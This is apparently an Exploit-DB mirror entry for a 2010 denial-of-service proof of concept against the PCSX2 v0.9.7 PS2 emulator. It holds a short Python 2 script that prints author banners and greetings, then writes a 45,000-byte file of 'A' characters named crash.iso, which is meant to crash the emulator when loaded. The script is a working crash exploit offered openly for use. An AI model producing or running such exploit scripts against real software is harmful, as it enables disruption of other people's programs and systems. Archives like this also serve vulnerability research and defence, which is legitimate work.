exploit-db-mirror/exploits/windows/dos/15458.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1.1 KiB
Text

# Exploit Title: PCSX2 v0.9.7 Crash
# Date: 08/11/2010
# Author: 41.w4r10r
# Version: 0.9.7
#Tested on : Windows XP SP2 Eng
# Software Link: http://pcsx2.net/downloads.php?p=publicbeta
#!/usr/bin/python
#PCSX2 is PS2 emulator to play PS2 Games on PC. This emulator is one of the
populer among the gamers.(It Works). PS2 Bios required to run this games.
print "--------------------Exploit By
41.w4r10r------------------------------\n"
print "-------------------41.w4r10r@gmail.com-----------------------------
\n"
print "----------------PCSX2 v0.9.7 PS2
Emulator------------------------------\n"
print "-------------Vendor Site :
http://pcsx2.net/-------------------------\n"
print "-------------Tested on Windows XP Sp2 Eng--------------------\n"
print "Greets: B0nd, nEo, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty,
vinnu, primary_key , Micr0 \n \n"
print " Catch Us : www.Garage4hackers.com \n \n"
print "Give Me 10Sec To create file :) \n"
junk = "A" * 45000;
filename = "crash.iso";
file = open(filename,"w")
file.writelines(junk)
file.close()
print "File Is created"
print "Press Any Key To Continue........."
raw_input()